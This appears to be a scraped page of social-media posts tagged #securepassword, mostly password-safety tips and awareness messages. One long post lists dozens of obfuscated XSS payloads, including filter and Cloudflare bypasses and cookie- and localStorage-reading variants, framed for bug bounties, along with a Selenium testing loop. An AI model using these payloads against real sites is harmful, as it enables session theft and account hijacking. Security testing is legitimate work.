Filter
Exclude
Time range
-
Near
Isn't it fucked up how "insecurepassword" is somehow more secure than "securepassword" makes you thnk
2
1
7
157
Replying to @yohueyx @noxheav3n
That’s the safe and securepassword you’re iphone generates for you😭😭
5
491
Even if you delete a post, screenshots or archives may still exist. Be thoughtful before sharing anything online play.google.com/store/apps/d… #digitalidentity #onlinetheft #cybercrime #securepassword #cybersecurity #cyberawareness #dial1930 #TNPolice #TamilNaduPolice
173
421
196,491
1 May 2025
Strong passwords are your first line of defense in the digital world.This #WorldPasswordDay,take a moment to upgrade your security & lock out the risks.Stay smart.Stay safe. @InfoSecAwa #NIXI #WorldPasswordDay #StaySafe #SecurePassword #DigitalSecurity #CyberSafe #OnlineSafety
1
6
140
Hide Sensitive Information In Power Automate Flows @platformspower bit.ly/46WL9NY #poweraytomate #securepassword #microsoft #powerautomateflows #power
2
53
20 Aug 2024
🔥 **XSS PAYLOADS** 🔥 1. `<base href="alert(1)" onfocus="a = /\/([^/] )$/.exec(baseURI); eval(a[1]);" tabindex=1 style="display:block" autofocus></base>` 2. `<img hrEF="x" sRC="data:x," oNLy=1 oNErrOR=prompt1>` 3. `<img src=oNlY=1 onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">` 4. `<img src=oNlY=1 onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">` 5. `` 6. `<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>` 7. `<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">` 8. `?foobar=<foo bar= onclick=<your js code>` --- 🚨 **ANOTHER 10 XSS PAYLOADS** 🚨 1. `?msg=`, `<svg/onload=alert("XSS") >` 2. `?utm_source=abc`;return false});});alert`xss`;` 3. `<a HREF=" javascrip t: alert&1par;document .domain) *>` 4. `”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>` 5. `<a href=[​]"​ onmouseover=prompt(1)//">XYZ</a>` 6. `<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //` 7. `<blink/onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}` 8. `<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>` 9. `<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>` 10. `jaVasCript:/--></title></style></textarea></script></xmp><svg/onload=' /"/ /onmouseover=1/ /[/[]/ alert(1)//'>` --- 💥 **XSS CLOUDFLARE PAYLOAD** 💥 1. `<svg onauxclick=0;[1].some(confirm)//` 2. `<svg onload=alert("")>` 3. `<a/href=j a v asc ri pt:(a l e r t (1))>` 4. `<svg onx=() onload=(confirm)(1)>` 5. `<svg onx=() onload=(confirm)(document.cookie)>` 6. `<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>` 7. `Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();` 8. `"><img src=x onmouseover=prompt(document.cookie)` 9. `Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();` 10. `"><onx=[] onmouseover=prompt(1)>` 11. crafted Payload : <body onload=alert('Abhishek_Dirisipo')>"" 12. KnoXSS XSS Payload - confirm?.(1) Key takeaways: 1) The 'img' tag is much more effective than 'script' 2) There are many CSP bypasses 3) If you want to be paid more, craft a better payload that doesn't require user interaction 4) Inject XSS into files and upload them anywhere that has file uploads Below are useful payloads to find more XSS on your pen tests and bug bounties: <img src=x onerror=alert()> <img/src=x onerror=alert()> <img src="x"/onerror=alert()> <img src="x"onerror=alert()> <img\nsrc="x"onerror=alert()> <img src="x"> // this shows you can inject html into website but you cannot execute javascript code <iframe srcdoc="<script>alert(document.domain)</script>"></iframe> <iframe srcdoc="<script src=whitelisteddomain.com></script>"></iframe> Payload: ' onfocus='alert(1)' autofocus=' Payload : <a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment=" Payload: <button popovertarget=x>Click me</button><img onbeforetoggle=alert(1) popover id=x>XSS Testing for Cross-Site Scripting (XSS) Vulnerabilities with Selenium ✅ Testing for Cross-Site Scripting (XSS) vulnerabilities is a critical aspect of web application security testing. ✅ XSS is a type of security vulnerability that occurs when an attacker injects malicious scripts into web pages that are then viewed by other users. ✅ These malicious scripts can execute in the context of the victim's browser and potentially steal sensitive data, hijack user sessions, or perform other malicious actions. Testing for XSS vulnerabilities is essential to identify and mitigate these security risks. ✅ Lets learn how to do it using Selenium: 1. Create a Selenium test script that interacts with web forms and inputs malicious scripts to test for XSS vulnerabilities. 2. Automate the process of submitting different types of payloads to identify potential vulnerabilities. ✅ Selenium Code Snippet: // Malicious XSS payloads format String[] xssPayloads = { "<script>alert('XSS Attack!');</script>", "<img src='x' onerror='alert(\"XSS Attack!\")'>", "<a href=\"javascript:alert('XSS Attack!')\">Click Me</a>" }; // You can also use String XSS_CONTENT = "<script>alert(\"1\");</script>"; // Loop through payloads and submit them for (String payload : xssPayloads) { // Clear the fields usernameField.clear(); passwordField.clear(); // Enter payload in the fields usernameField.sendKeys(payload); passwordField.sendKeys("securepassword"); // Replace with a valid password // Click the login button loginButton.click(); // Check if the alert is present (indicating XSS) Here you need to validate the expected error message. Note: this is just a way to help you understanding the process or steps to automate XSS vulnerabilities using Selenium, keep learning. 🔴 Vulnerable page example: lnkd.in/gu75iA4u **** For E2E SDET or Automation Testing trainings along with 1:1 career guidance, API, UI, Mobile,DevOps ChatGPT refer demo here: lnkd.in/giCxnJJ7 ***** 📕 YouTube: lnkd.in/gGUGmb-P 📗 1:1 Call on Career Guidance: lnkd.in/ddayTwnq 📘 Medium: lnkd.in/gkUX8eKY ***** hashtag#QualityAssurance hashtag#TestingExcellence hashtag#QAHeroes hashtag#automation hashtag#softwaretesting hashtag#qa #randompayloads #bugbounty #XSS #cloudflare #cybersecurity --- Let me know if you need further adjustments!
3
78
241
12,663
📣 #ShoutOutSunday to @LastPass for Business! The way LastPass allows companies to securely store, share, and manage passwords and account information makes users go 🤩 . 👀 Check out their reviews: bit.ly/4aYPf95 #CustomerVoice #PasswordManagement #SecurePassword
1
2
931
Bad password-policy leads to insecure passwords. More information in out blog post: codepurple.ch/blog/gute-pass… #passwordpolicy #securepassword #cybersecurity #infosec #ethicalhacking #swissmade #pentesting #hacking
2
2
25
Cracking the Cybersecurity Code: Craft a password that is puur-fectly unique, safeguarding you from any potential cyber threats. #SecurePassword #CyberSecurity
11
7
59
8,673
21 Dec 2023
Eine Plattform zum Austausch von Gesundheitsdaten schlägt solche Passwörter als "sicher" vor... In welchem Jahr sind wir? 2023? #passwordfail #security #securePassword #insurance @grauhut
4
1
15
1,030
சமூக வலைத்தளங்களில் Strong Password பயன்படுத்தி பாதுகாத்து கொள்ளவும் To Report Financial Crimes - Call 1930 To Report Non-Financial Crimes - cybercrime.gov.in #TNCyberCrime #CyberCrimeHelpline #CyberCrimeMemes #TwoFactorAuthentication #StrongPassword #SecurePassword
1
4
12
786
Can you crack the password? WRONG ANSWERS ONLY!! Happy World Password Day!!! #worldpasswordday2023 #strongpasswords #security #securepassword #codecracker #challenge #matrix3d
3
40
Dreaming up a strong password begins with thinking beyond just creative phrases. Here is what you need to incorporate to create a #securepassword. #CyberPeace☮️ #CyberSecurity #CyberSecurityTips
7
13
376
💧 Two security talks at next Brisbane #Drupal #Wordpress meetup next Thursday. Learn more about Security Headers and passwords meetup.com/drupal-brisbane/e… #Drupal10 #Wordpress #BrisbaneMeetup #SecurityTalk #SecurePassword #SecurityHeaders
2
2
133